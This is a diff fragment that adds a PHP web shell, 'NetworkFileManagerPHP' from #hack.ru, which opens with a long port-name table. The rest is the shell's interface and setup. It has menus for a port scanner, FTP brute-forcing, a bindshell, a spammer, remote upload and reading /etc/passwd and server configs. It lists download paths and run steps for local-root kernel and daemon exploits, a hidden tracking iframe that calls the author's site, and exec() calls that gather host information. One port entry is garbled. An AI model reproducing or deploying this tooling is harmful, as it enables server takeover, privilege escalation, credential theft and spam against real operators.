+$port[45] = "Message Processing Module [recv]";
+
+$port[46] = "MPM [default send]";
+
+$port[47] = "NI FTP";
+
+$port[48] = "Digital Audit Daemon";
+
+$port[49] = "TACACS, Login Host Protocol";
+
+$port[50] = "RMCP, re-mail-ck";
+
+$port[53] = "DNS";
+
+$port[57] = "MTP (any private terminal access)";
+
+$port[59] = "NFILE";
+
+$port[60] = "Unassigned";
+
+$port[61] = "NI MAIL";
+
+$port[62] = "ACA Services";
+
+$port[63] = "whois++";
+
+$port[64] = "Communications Integrator (CI)";
+
+$port[65] = "TACACS-Database Service";
+
+$port[66] = "Oracle SQL*NET";
+
+$port[67] = "bootps (Bootstrap Protocol Server)";
+
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+
+$port[70] = "Gopher";
+
+$port[71] = "Remote Job Service";
+
+$port[72] = "Remote Job Service";
+
+$port[73] = "Remote Job Service";
+
+$port[74] = "Remote Job Service";
+
+$port[75] = "any private dial out service";
+
+$port[76] = "Distributed External Object Store";
+
+$port[77] = "any private RJE service";
+
+$port[78] = "vettcp";
+
+$port[79] = "finger";
+
+$port[80] = "World Wide Web HTTP";
+
+$port[81] = "HOSTS2 Name Serve";
+
+$port[82] = "XFER Utility";
+
+$port[83] = "MIT ML Device";
+
+$port[84] = "Common Trace Facility";
+
+$port[85] = "MIT ML Device";
+
+$port[86] = "Micro Focus Cobol";
+
+$port[87] = "any private terminal link";
+
+$port[88] = "Kerberos, WWW";
+
+$port[89] = "SU/MIT Telnet Gateway";
+
+$port[90] = "DNSIX Securit Attribute Token Map";
+
+$port[91] = "MIT Dover Spooler";
+
+$port[92] = "Network Printing Protocol";
+
+$port[93] = "Device Control Protocol";
+
+$port[94] = "Tivoli Object Dispatcher";
+
+$port[95] = "supdup";
+
+$port[96] = "DIXIE";
+
+$port[98] = "linuxconf";
+
+$port[99] = "Metagram Relay";
+
+$port[100] = "[unauthorized use]";
+
+$port[101] = "HOSTNAME";
+
+$port[102] = "ISO, X.400, ITOT";
+
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+
+$port[105] = "CCSO name server protocol";
+
+$port[106] = "poppassd";
+
+$port[107] = "Remote Telnet Service";
+
+$port[108] = "SNA Gateway Access Server";
+
+$port[109] = "POP2";
+
+$port[110] = "POP3";
+
+$port[111] = "Sun RPC Portmapper";
+
+$port[112] = "McIDAS Data Transmission Protocol";
+
+$port[113] = "Authentication Service";
+
+$port[115] = "sftp (Simple File Transfer Protocol)";
+
+$port[116] = "ANSA REX Notify";
+
+$port[117] = "UUCP Path Service";
+
+$port[118] = "SQL Services";
+
+$port[119] = "NNTP";
+
+$port[120] = "CFDP";
+
+$port[123] = "NTP";
+
+$port[124] = "SecureID";
+
+$port[129] = "PWDGEN";
+
+$port[133] = "statsrv";
+
+$port[135] = "loc-srv/epmap";
+
+$port[137] = "netbios-ns";
+
+$port[138] = "netbios-dgm (UDP)";
+
+$port[139] = "NetBIOS";
+
+$port[143] = "IMAP";
+
+$port[144] = "NewS";
+
+$port[150] = "SQL-NET";
+
+$port[152] = "BFTP";
+
+$port[153] = "SGMP";
+
+$port[156] = "SQL Service";
+
+$port[161] = "SNMP";
+
+$port[175] = "vmnet";
+
+$port[177] = "XDMCP";
+
+$port[178] = "NextStep Window Server";
+
+$port[179] = "BGP";
+
+$port[180] = "SLmail admin";
+
+$port[199] = "smux";
+
+$port[210] = "Z39.50";
+
+$port[213] = "IPX";
+
+$port[218] = "MPP";
+
+$port[220] = "IMAP3";
+
+$port[256] = "RAP";
+
+$port[257] = "Secure Electronic Transaction";
+
+$port[258] = "Yak Winsock Personal Chat";
+
+$port[259] = "ESRO";
+
+$port[264] = "FW1_topo";
+
+$port[311] = "Apple WebAdmin";
+
+$port[350] = "MATIP type A";
+
+$port[351] = "MATIP type B";
+
+$port[363] = "RSVP tunnel";
+
+$port[366] = "ODMR (On-Demand Mail Relay)";
+
+$port[371] = "Clearcase";
+
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+
+$port[389] = "LDAP";
+
+$port[407] = "Timbuktu";
+
+$port[427] = "Server Location";
+
+$port[434] = "Mobile IP";
+
+$port[443] = "ssl";
+
+$port[444] = "snpp, Simple Network Paging Protocol";
+
+$port[445] = "SMB";
+
+$port[458] = "QuickTime TV/Conferencing";
+
+$port[468] = "Photuris";
+
+$port[475] = "tcpnethaspsrv";
+
+$port[500] = "ISAKMP, pluto";
+
+$port[511] = "mynet-as";
+
+$port[512] = "biff, rexec";
+
+$port[513] = "who, rlogin";
+
+$port[514] = "syslog, rsh";
+
+$port[515] = "lp, lpr, line printer";
+
+$port[517] = "talk";
+
+$port[520] = "RIP (Routing Information Protocol)";
+
+$port[521] = "RIPng";
+
+$port[522] = "ULS";
+
+$port[531] = "IRC";
+
+$port[543] = "KLogin, AppleShare over IP";
+
+$port[545] = "QuickTime";
+
+$port[548] = "AFP";
+
+$port[554] = "Real Time Streaming Protocol";
+
+$port[555] = "phAse Zero";
+
+$port[563] = "NNTP over SSL";
+
+$port[575] = "VEMMI";
+
+$port[581] = "Bundle Discovery Protocol";
+
+$port[593] = "MS-RPC";
+
+$port[608] = "SIFT/UFT";
+
+$port[626] = "Apple ASIA";
+
+$port[631] = "IPP (Internet Printing Protocol)";
+
+$port[635] = "RLZ DBase";
+
+$port[636] = "sldap";
+
+$port[642] = "EMSD";
+
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+
+$port[655] = "tinc";
+
+$port[660] = "Apple MacOS Server Admin";
+
+$port[666] = "Doom";
+
+$port[674] = "ACAP";
+
+$port[687] = "AppleShare IP Registry";
+
+$port[700] = "buddyphone";
+
+$port[705] = "AgentX for SNMP";
+
+$port[901] = "swat, realsecure";
+
+$port[993] = "s-imap";
+
+$port[995] = "s-pop";
+
+$port[1024] = "Reserved";
+
+$port[1025] = "network blackjack";
+
+$port[1062] = "Veracity";
+
+$port[1080] = "SOCKS";
+
+$port[1085] = "WebObjects";
+
+$port[1227] = "DNS2Go";
+
+$port[1243] = "SubSeven";
+
+$port[1338] = "Millennium Worm";
+
+$port[1352] = "Lotus Notes";
+
+$port[1381] = "Apple Network License Manager";
+
+$port[1417] = "Timbuktu Service 1 Port";
+
+$port[1418] = "Timbuktu Service 2 Port";
+
+$port[1419] = "Timbuktu Service 3 Port";
+
+$port[1420] = "Timbuktu Service 4 Port";
+
+$port[1433] = "Microsoft SQL Server";
+
+$port[1434] = "Microsoft SQL Monitor";
+
+$port[1477] = "ms-sna-server";
+
+$port[1478] = "ms-sna-base";
+
+$port[1490] = "insitu-conf";
+
+$port[1494] = "Citrix ICA Protocol";
+
+$port[1498] = "Watcom-SQL";
+
+$port[1500] = "VLSI License Manager";
+
+$port[1503] = "T.120";
+
+$port[1521] = "Oracle SQL";
+
+$port[1522] = "Ricardo North America License Manager";
+
+$port[1524] = "ingres";
+
+$port[1525] = "prospero";
+
+$port[1526] = "prospero";
+
+$port[1527] = "tlisrv";
+
+$port[1529] = "oracle";
+
+$port[1547] = "laplink";
+
+$port[1604] = "Citrix ICA, MS Terminal Server";
+
+$port[1645] = "RADIUS Authentication";
+
+$port[1646] = "RADIUS Accounting";
+
+$port[1680] = "Carbon Copy";
+
+$port[1701] = "L2TP/LSF";
+
+$port[1717] = "Convoy";
+
+$port[1720] = "H.323/Q.931";
+
+$port[1723] = "PPTP control port";
+
+$port[1731] = "MSICCP";
+
+$port[1755] = "Windows Media .asf";
+
+$port[1758] = "TFTP multicast";
+
+$port[1761] = "cft-0";
+
+$port[1762] = "cft-1";
+
+$port[1763] = "cft-2";
+
+$port[1764] = "cft-3";
+
+$port[1765] = "cft-4";
+
+$port[1766] = "cft-5";
+
+$port[1767] = "cft-6";
+
+$port[1808] = "Oracle-VP2";
+
+$port[1812] = "RADIUS server";
+
+$port[1813] = "RADIUS accounting";
+
+$port[1818] = "ETFTP";
+
+$port[1973] = "DLSw DCAP/DRAP";
+
+$port[1985] = "HSRP";
+
+$port[1999] = "Cisco AUTH";
+
+$port[2001] = "glimpse";
+
+$port[2049] = "NFS";
+
+$port[2064] = "distributed.net";
+
+$port[2065] = "DLSw";
+
+$port[2066] = "DLSw";
+
+$port[2106] = "MZAP";
+
+$port[2140] = "DeepThroat";
+
+$port[2301] = "Compaq Insight Management Web Agents";
+
+$port[2327] = "Netscape Conference";
+
+$port[2336] = "Apple UG Control";
+
+$port[2427] = "MGCP gateway";
+
+$port[2504] = "WLBS";
+
+$port[2535] = "MADCAP";
+
+$port[2543] = "sip";
+
+$port[2592] = "netrek";
+
+$port[2727] = "MGCP call agent";
+
+$port[2628] = "DICT";
+
+$port[2998] = "ISS Real Secure Console Service Port";
+
+$port[3000] = "Firstclass";
+
+$port[3001] = "Redwood Broker";
+
+$port[3031] = "Apple AgentVU";
+
+$port[3128] = "squid";
+
+$port[3130] = "ICP";
+
+$port[3150] = "DeepThroat";
+
+$port[3264] = "ccmail";
+
+$port[3283] = "Apple NetAssitant";
+
+$port[3288] = "COPS";
+
+$port[3305] = "ODETTE";
+
+$port[3306] = "mySQL";
+
+$port[3389] = "RDP Protocol (Terminal Server)";
+
+$port[3521] = "netrek";
+
+$port[4000] = "icq, command-n-conquer and shell nfm";
+
+$port[4321] = "rwhois";
+
+$port[4333] = "mSQL";
+
+$port[4444] = "KRB524";
+
+$port[4827] = "HTCP";
+
+$port[5002] = "radio free ethernet";
+
+$port[5004] = "RTP";
+
+$port[5005] = "RTP";
+
+$port[5010] = "Yahoo! Messenger";
+
+$port[5050] = "multimedia conference control tool";
+
+$port[5060] = "SIP";
+
+$port[5150] = "Ascend Tunnel Management Protocol";
+
+$port[5190] = "AIM";
+
+$port[5500] = "securid";
+
+$port[5501] = "securidprop";
+
+$port[5423] = "Apple VirtualUser";
+
+$port[5555] = "Personal Agent";
+
+$port[5631] = "PCAnywhere data";
+
+$port[5632] = "PCAnywhere";
+
+$port[5678] = "Remote Replication Agent Connection";
+
+$port[5800] = "VNC";
+
+$port[5801] = "VNC";
+
+$port[5900] = "VNC";
+
+$port[5901] = "VNC";
+
+$port[6000] = "X Windows";
+
+$port[6112] = "BattleNet";
+
+$port[6502] = "Netscape Conference";
+
+$port[6667] = "IRC";
+
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+
+$port[6699] = "napster";
+
+$port[6776] = "Sub7";
+
+$port[6970] = "RTP";
+
+$port[7007] = "MSBD, Windows Media encoder";
+
+$port[7070] = "RealServer/QuickTime";
+
+$port[7777] = "cbt";
+
+$port[7778] = "Unreal";
+
+$port[7648] = "CU-SeeMe";
+
+$port[7649] = "CU-SeeMe";
+
+$port[8000] = "iRDMI/Shoutcast Server";
+
+$port[8010] = "WinGate 2.1";
+
+$port[8080] = "HTTP";
+
+$port[8181] = "HTTP";
+
+$port[8383] = "IMail WWW";
+
+$port[8875] = "napster";
+
+$port[8888] = "napster";
+
+$port[8889] = "Desktop Data TCP 1";
+
+$port[8890] = "Desktop Data TCP 2";
+
+$port[8891] = "Desktop Data TCP 3: NESS application";
+
+$port[8892] = "Desktop Data TCP 4: FARM product";
+
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+
+$port[8894] = "Desktop Data TCP 6: COAL application";
+
+$port[9000] = "CSlistener";
+
+$port[10008] = "cheese worm";
+
+$port[11371] = "PGP 5 Keyserver";
+
+$port[13223] = "PowWow";
+
+$port[13224] = "PowWow";
+
+$port[14237] = "Palm";
+
+$port[14238] = "Palm";
+
+$port[18888] = "LiquidAudio";
+
+$port[21157] = "Activision";
+
+$port[22555] = "Vocaltec Web Conference";
+
+$port[23213] = "PowWow";
+
+$port[23214] = "PowWow";
+
+$port[23456] = "EvilFTP";
+
+$port[26000] = "Quake";
+
+$port[27001] = "QuakeWorld";
+
+$port[27010] = "Half-Life";
+
+$port[27015] = "Half-Life";
+
+$port[27960] = "QuakeIII";
+
+$port[30029] = "AOL Admin";
+
+$port[31337] = "Back Orifice";
+
+$port[32777] = "rpc.walld";
+
+$port[45000] = "Cisco NetRanger postofficed";
+
+$port[32773] = "rpc bserverd";
+
+$port[32776] = "rpc.spray";
+
+$port[32779] = "rpc.cmsd";
+
+$port[38036] = "timestep";
+
+$port[40193] = "Novell";
+
+$port[41524] = "arcserve discovery";
+
+
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (� #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
